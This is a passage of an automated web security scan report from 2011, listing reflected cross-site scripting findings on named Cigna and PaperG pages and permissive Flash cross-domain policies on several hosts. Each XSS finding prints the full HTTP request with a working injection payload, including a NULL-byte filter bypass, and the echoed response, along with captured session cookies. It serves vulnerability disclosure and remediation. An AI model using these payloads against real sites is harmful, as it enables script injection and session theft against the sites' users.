This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /corp/sso/professional/controller?command=forgotidbegin&PORTAL=member&DESTINATION=/corp/sso/professional/secure/controller?command=homepage%00b12dc"><script>alert(1)</script>64cebfa3f0d HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=781FB9EE7FD1107FC7FAA536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:26 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=906391387FD1107FCA65A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Id - Enter User Information</title>
<link rel="S
...[SNIP]...
<input type="button" value="Cancel" onClick="JavaScript:location.replace('/corp/sso/professional/secure/controller?command=homepage.b12dc"><script>alert(1)</script>64cebfa3f0d');">
...[SNIP]...
2.26. https://sso.corp.cigna.com/corp/sso/professional/controller [fname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1c3e"><script>alert(1)</script>bb6ceb1e7b2 was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /corp/sso/professional/controller HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotidbegin&PORTAL=member&DESTINATION=/corp/sso/professional/secure/controller?command=homepage
Cache-Control: max-age=0
Origin: https://sso.corp.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=7FDE78B47FD1107FC856A536181C0CE6
Content-Length: 73

command=forgotidsrch&DOB=%2F%2F&fname=a1c3e"><script>alert(1)</script>bb6ceb1e7b2&lname=&DOB_MNT=&DOB_DAY=&DOB_YEAR=

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:33:33 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=DC6799A87FD1107FCF37A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Id - Enter User Information</title>
<link rel="S
...[SNIP]...
<input type="text" size="15" maxlength="25" name="fname" value="a1c3e"><script>alert(1)</script>bb6ceb1e7b2">
...[SNIP]...
2.27. https://sso.corp.cigna.com/corp/sso/professional/controller [lname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7324"><script>alert(1)</script>cce7d41f523 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /corp/sso/professional/controller HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotidbegin&PORTAL=member&DESTINATION=/corp/sso/professional/secure/controller?command=homepage
Cache-Control: max-age=0
Origin: https://sso.corp.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=7FDE78B47FD1107FC856A536181C0CE6
Content-Length: 73

command=forgotidsrch&DOB=%2F%2F&fname=&lname=a7324"><script>alert(1)</script>cce7d41f523&DOB_MNT=&DOB_DAY=&DOB_YEAR=

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:33:40 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=E033B6027FD1107FCF70A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Id - Enter User Information</title>
<link rel="S
...[SNIP]...
<input type="text" size="15" maxlength="25" name="lname" value="a7324"><script>alert(1)</script>cce7d41f523">
...[SNIP]...
2.28. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [boards%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/albany-times-union/1552/0.html

Issue detail

The value of the boards%5B%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40279"><script>alert(1)</script>5f4ea1bf7dc was submitted in the boards%5B%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flyerboard/albany-times-union/1552/0.html?bid=1552&pid=891&cid=0&view=all&boards%5B%5D=186240279"><script>alert(1)</script>5f4ea1bf7dc&boards%5B%5D=1753&boards%5B%5D=1552 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045; __utmz=1.1305557272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027440590.1305557272.1305557272.1305557272.1; __utmc=1; __utmb=1.1.10.1305557272

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 5558


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
<script type="text/javascript" src="/jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279"><script>alert(1)</script>5f4ea1bf7dc&boards[]=1753&boards[]=1552">
...[SNIP]...
2.29. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b3b4'%3balert(1)//5cff8161487 was submitted in the bid parameter. This input was echoed as 8b3b4';alert(1)//5cff8161487 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=15528b3b4'%3balert(1)//5cff8161487 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 48336


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'alert(1)//5cff8161487'' at line 1
   var view_all_board = docume
...[SNIP]...
PG_scriptParent = PG_scriptEl.parentNode;

if(!board_id)
   var board_id=[];
if(!pub_id)    
   var pub_id=[];
if(!widget_id)
   var widget_id=[];

board_id[15528b3b4';alert(1)//5cff8161487] = 15528b3b4';alert(1)//5cff8161487;
pub_id[15528b3b4';alert(1)//5cff8161487] = 891;
widget_id[15528b3b4';alert(1)//5cff8161487] = 0;
var bid = 15528b3b4';alert(1)//5cff8161487;
var pid = 891;
var wid = 0;


var objBody = document.get
...[SNIP]...
2.30. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cabe8%3balert(1)//99cbe00d64a was submitted in the bid parameter. This input was echoed as cabe8;alert(1)//99cbe00d64a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552cabe8%3balert(1)//99cbe00d64a HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 48140


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL1552cabe8;alert(1)//99cbe00d64a = 'http://www.paperg.com/jsfb/embed.php?view=all&pid=891&cid=0&bid=1552cabe8%3balert(1)//99cbe00d64a';
// links stylesheets in head
function pg_linkss(filename)
{
   var head = document.getElementsByT
...[SNIP]...
2.31. http://www.paperg.com/jsfb/embed.php [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cd06"%3balert(1)//f522b4beeb1 was submitted in the bid parameter. This input was echoed as 9cd06";alert(1)//f522b4beeb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=15529cd06"%3balert(1)//f522b4beeb1 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:49:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 48159


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...
PG_scriptParent = PG_scriptEl.parentNode;

if(!board_id)
   var board_id=[];
if(!pub_id)    
   var pub_id=[];
if(!widget_id)
   var widget_id=[];

board_id[15529cd06";alert(1)//f522b4beeb1] = 15529cd06";alert(1)//f522b4beeb1;
pub_id[15529cd06";alert(1)//f522b4beeb1] = 891;
widget_id[15529cd06";alert(1)//f522b4beeb1] = 0;
var bid = 15529cd06";alert(1)//f522b4beeb1;
var pid = 891;
var wid = 0;


var objBody = document.get
...[SNIP]...
2.32. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26471"-alert(1)-"f29968cc4e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279&26471"-alert(1)-"f29968cc4e9=1 HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html?bid=1552&pid=891&cid=0&view=all&boards%5B%5D=186240279%22%3E%3Cscript%3Ealert(1)%3C/script%3E5f4ea1bf7dc&boards%5B%5D=1753&boards%5B%5D=1552
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27786045.1907620487.1305558925.1305558925.1305558925.1; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:01:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 47764


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...
pt may not be the last element
var PG_scriptEl = PG_scripts[ PG_scripts.length - 1 ];

if(PG_scriptEl.src != "http://www.paperg.com/jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279&26471"-alert(1)-"f29968cc4e9=1")
{
var page_script = '';
var i = 0;
for(i = 0; i < PG_scripts.length; i++)
{
page_script = PG_scripts[i];
if(page_script.src == "http://www.paperg.com/jsfb/em
...[SNIP]...
2.33. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbf8b'-alert(1)-'83f2db3f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279&cbf8b'-alert(1)-'83f2db3f50=1 HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html?bid=1552&pid=891&cid=0&view=all&boards%5B%5D=186240279%22%3E%3Cscript%3Ealert(1)%3C/script%3E5f4ea1bf7dc&boards%5B%5D=1753&boards%5B%5D=1552
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27786045.1907620487.1305558925.1305558925.1305558925.1; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:01:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 47761


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...
://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL1552 = 'http://www.paperg.com/jsfb/embed.php?view=all&pid=891&cid=0&bid=1552&boards[]=186240279&cbf8b'-alert(1)-'83f2db3f50=1';
// links stylesheets in head
function pg_linkss(filename)
{
   var head = document.getElementsByTagName('head')[0];
   link = document.createElement('link');
   link.rel = 'stylesheet';
   link.media
...[SNIP]...
3. Flash cross-domain policy  previous  next
There are 11 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

3.1. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 17 May 2011 04:15:49 GMT
Date: Mon, 16 May 2011 04:15:49 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 46337

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
3.2. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:83e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:04 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
3.3. https://www.paperg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paperg.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:47 GMT
Server: Apache
Last-Modified: Wed, 09 Sep 2009 02:28:24 GMT
ETag: "105-4731bd6544200"
Accept-Ranges: bytes
Content-Length: 261
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!-- http://www.paperg.com/crossdomain.xml
-->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
3.4. http://www.placelocal.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.placelocal.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:19:41 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Mon, 25 Oct 2010 19:42:00 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 15:19:41 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false" />
...[SNIP]...
3.5. http://ads.bridgetrack.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 810
Content-Type: text/html
Date: Mon, 16 May 2011 15:20:07 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
   <allow-access-from domain="travelerssaves.com" />
   <allow-access-from domain="moneyneedsattention.com" />
   <allow-access-from domain="www.moneyneedsattention.com"/>
   <allow-access-from domain="portal.kaplan.edu" />
   <allow-access-from domain="www.portal.kaplan.edu"/>
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...
3.6. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

